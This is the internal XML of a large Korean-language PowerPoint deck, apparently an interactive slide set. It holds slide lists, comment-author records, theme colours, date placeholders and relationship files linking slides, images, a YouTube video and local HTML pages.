            <p14:sldId id="640"/>
            <p14:sldId id="644"/>
            <p14:sldId id="646"/>
            <p14:sldId id="673"/>
            <p14:sldId id="677"/>
            <p14:sldId id="678"/>
            <p14:sldId id="645"/>
            <p14:sldId id="642"/>
            <p14:sldId id="643"/>
            <p14:sldId id="683"/>
            <p14:sldId id="679"/>
            <p14:sldId id="680"/>
            <p14:sldId id="681"/>
            <p14:sldId id="682"/>
            <p14:sldId id="432"/>
            <p14:sldId id="433"/>
            <p14:sldId id="434"/>
            <p14:sldId id="423"/>
            <p14:sldId id="563"/>
            <p14:sldId id="592"/>
            <p14:sldId id="564"/>
            <p14:sldId id="565"/>
            <p14:sldId id="586"/>
            <p14:sldId id="587"/>
            <p14:sldId id="588"/>
            <p14:sldId id="589"/>
            <p14:sldId id="590"/>
            <p14:sldId id="591"/>
            <p14:sldId id="593"/>
            <p14:sldId id="594"/>
            <p14:sldId id="595"/>
            <p14:sldId id="596"/>
            <p14:sldId id="597"/>
            <p14:sldId id="598"/>
            <p14:sldId id="599"/>
            <p14:sldId id="600"/>
            <p14:sldId id="583"/>
            <p14:sldId id="584"/>
            <p14:sldId id="585"/>
            <p14:sldId id="566"/>
            <p14:sldId id="268"/>
            <p14:sldId id="365"/>
            <p14:sldId id="366"/>
            <p14:sldId id="507"/>
            <p14:sldId id="296"/>
            <p14:sldId id="29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izona95" initials="a" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="arizona95" providerId="None"/>
      </p:ext>
    </p:extLst>
  </p:cmAuthor>
  <p:cmAuthor id="2" name="도우" initials="도" lastIdx="1" clrIdx="1">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="b3fdc41ca2044cf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400"/>
    <a:srgbClr val="2E75B6"/>
    <a:srgbClr val="FEF0FE"/>
    <a:srgbClr val="FFCCFF"/>
    <a:srgbClr val="FA85D3"/>
    <a:srgbClr val="0C0C0C"/>
    <a:srgbClr val="4472C4"/>
    <a:srgbClr val="FFC000"/>
    <a:srgbClr val="B9B9B9"/>
    <a:srgbClr val="89D4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01" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="114" d="100"/>
          <a:sy n="114" d="100"/>
        </p:scale>
        <p:origin x="24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357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide356.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378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide377.xml"/><Relationship Id="rId399" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide398.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424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide423.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368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide367.xml"/><Relationship Id="rId389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide388.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414" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide413.xml"/><Relationship Id="rId435" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide434.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slide" Target="slides/slide378.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25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide424.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436" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/commentAuthors" Target="commentAuthors.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viewProps" Target="viewProps.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theme" Target="theme/theme1.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tableStyles" Target="tableStyle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0481F0-79A4-4005-98A0-E2D3EC31CA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026B3D3-DCCB-4A07-B0DD-5543B7034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D9AC3FD-A806-4EBD-B90B-3CD603C7F3EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5961A6F7-18CE-4D97-8B22-87968FF9FBF8}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2023-08-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="바닥글 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAAB802B-FA19-43A7-BCDF-A9F08327D3D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4CA637C-E9BE-4CC2-BC4D-84113B59005F}"/>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9304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3513E9-3B4F-40F7-9817-FA7FFFB527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1C20440-E792-4EAF-90D1-973CFC58F0F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947AC27-E2EE-453E-84B9-A3DB250B6179}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5961A6F7-18CE-4D97-8B22-87968FF9FBF8}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2023-08-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="바닥글 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87C64E3D-00A7-4F3D-9072-3E2181DE3A5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1F152D-39FB-401B-AE62-CAA8D30D8204}"/>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19339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CBEB766-9B37-4186-A52C-BEA602250B2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472C367-6AB0-45D0-A9BB-A54DDA36F9A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C76DEC4-3F14-4645-A85E-F57A22A2FEC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5961A6F7-18CE-4D97-8B22-87968FF9FBF8}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2023-08-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="바닥글 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65278FE0-5E0A-4072-B202-B9D9624E237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F00AEC0-8237-46D8-A127-DD900DDB3908}"/>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2178328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80BD6B-E7FB-4331-875F-864D94F5833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4E93028-63D9-46D6-8B3A-40AB76FC0EA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FC29581-CF73-4701-803B-266B2624730F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5961A6F7-18CE-4D97-8B22-87968FF9FBF8}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2023-08-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="바닥글 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F72EB11-9DDA-43AF-A854-377C80D0A04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008E4F2-697A-41EE-985D-36D0A79EA60C}"/>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42811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0D8CB1-852D-401E-B278-FBC5613F8D1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118E5B5A-E122-4CEF-A426-B2355574C2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F0ABCD7-C359-4AFA-8425-996C323D15C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5961A6F7-18CE-4D97-8B22-87968FF9FBF8}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2023-08-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="바닥글 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3287B66A-CE4B-46BB-BB28-42A7D081E12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167310-4314-4BB7-AB49-79FE227EEA4B}"/>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40408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266D10-FE53-4436-B95E-E2E8F3898BA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72A40FE-884A-4E81-9192-3426D6E7A8B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A60227F-EB33-4B57-8F10-BCA3F2BC250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B944643-7641-42D1-B6D5-C9C7EAC11298}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5961A6F7-18CE-4D97-8B22-87968FF9FBF8}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2023-08-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="바닥글 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A42BD34A-7C75-41A8-850F-D9160B9B508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C51D1D3-1BD9-4100-8C71-110C352EEBE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3932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6A9931-2247-44C9-89DF-059E9713404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2D8C236-25CD-4439-B9ED-25D3898949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7B7C5AF-DDC3-48AF-B2D5-F4F947D1F95F}"/>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12C9BCF-920C-4DAB-878F-359E434B33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B7625E3-DE59-4610-A6BE-23205B2AFA7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B2A1A04B-45A7-40BE-91D8-38755C79EA77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5961A6F7-18CE-4D97-8B22-87968FF9FBF8}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2023-08-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="바닥글 개체 틀 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8CCD877-D8CF-4650-BE74-85374E948C5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3EB9669-0D1B-4B47-99C6-16323285D8D3}"/>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55785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543F9A-E385-42C7-8701-4D74B5B8CA5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78EB64F-8ED3-41B4-9700-3628CA44285F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5961A6F7-18CE-4D97-8B22-87968FF9FBF8}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2023-08-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="바닥글 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77927889-7E0F-400C-AAED-DF87414DB4A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5C34461-452C-4ED9-90D0-B4AA91A20F72}"/>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842567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0CB02B8-4E17-4DA0-A3EA-0676B7C1467D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5961A6F7-18CE-4D97-8B22-87968FF9FBF8}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2023-08-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="바닥글 개체 틀 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62AB1434-C511-48DD-88E3-012FF7B9FF2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99F2338-A1C3-4BEE-9E95-CA75D1B17E2A}"/>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7044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3C02C4-867C-42ED-93E1-803EC71FAF6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472612D-AC7A-4A81-9FE9-9D2CF84385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01AE26A-4CBD-446C-A829-C39559D9A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E8CB2B1-EBC3-466A-B38E-9AC64511DF39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5961A6F7-18CE-4D97-8B22-87968FF9FBF8}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2023-08-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="바닥글 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A933EDA-E4CA-4779-B5D1-986F4F492ED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B15E1F6-72DE-452F-8D71-E6DDE060AB5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36914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2966F9-6418-4A3B-98EC-67D6DA91330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D6428325-C368-44A4-B5A9-5734A2A741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E633756-F646-4E38-BB54-CD2404C80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2464646-9AA8-494A-9141-A0F72F9C0269}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5961A6F7-18CE-4D97-8B22-87968FF9FBF8}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2023-08-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="바닥글 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6028736-F7B8-4EFD-B348-7A603061028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66A8044-83D1-4160-82A3-8E2C0A7DDA6E}"/>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278306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D17A306-05F3-40CE-AA98-32DCDEE87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74B5F2A-448A-47DA-A1B4-56AD66D74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68726F2-2EEC-4433-A65F-A673E510A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1A6F7-18CE-4D97-8B22-87968FF9FBF8}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2023-08-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="바닥글 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB67D242-A733-4D47-BA32-E853E3ACC2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0BBF35AC-9656-4592-B2F5-ACEBCC3476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6171716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2.xml"/><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 Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide100.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42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slide" Target="slide117.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide104.xm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slide" Target="slide48.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide126.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide102.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slide" Target="slide101.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image121.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide105.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-94.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide101.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109.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide106.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image" Target="../media/image122.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide101.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10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slide" Target="slide301.xml"/><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108.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0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101.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109.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide110.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image" Target="../media/image122.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide101.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide111.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><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slide" Target="slide101.xml"/><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112.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slide" Target="slide42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slide" Target="slide42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101.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109.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide115.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image" Target="../media/image129.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide101.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide116.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01.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slide" Target="slide101.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11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22.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide101.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image132.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide119.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image" Target="../media/image122.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide101.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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slide" Target="slide22.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide120.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9.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide301.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121.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slide" Target="slide429.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image" Target="../media/image129.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide101.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide123.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slide" Target="slide429.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124.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slide" Target="slide429.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125.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10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 Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide101.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide127.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide101.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-70.html" TargetMode="Externa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109.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide128.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image" Target="../media/image122.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide101.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide12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slide" Target="slide101.xml"/><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13.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slide" Target="slide429.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38.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide101.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=o4dCzqy1JrY" TargetMode="Externa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140.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image139.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide132.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slide" Target="slide101.xml"/><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144.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image143.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide13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5.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide101.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide134.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide153.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide136.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide429.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide48.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide135.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9.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image146.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide137.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9.xml"/><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138.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9.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image149.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image148.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide139.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/ItCS/calendar.php-72.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide48.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109.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide14.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image" Target="../media/image122.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide48.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide141.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9.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42.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9.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9.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9.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45.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8.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109.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></Relationships>
</file>

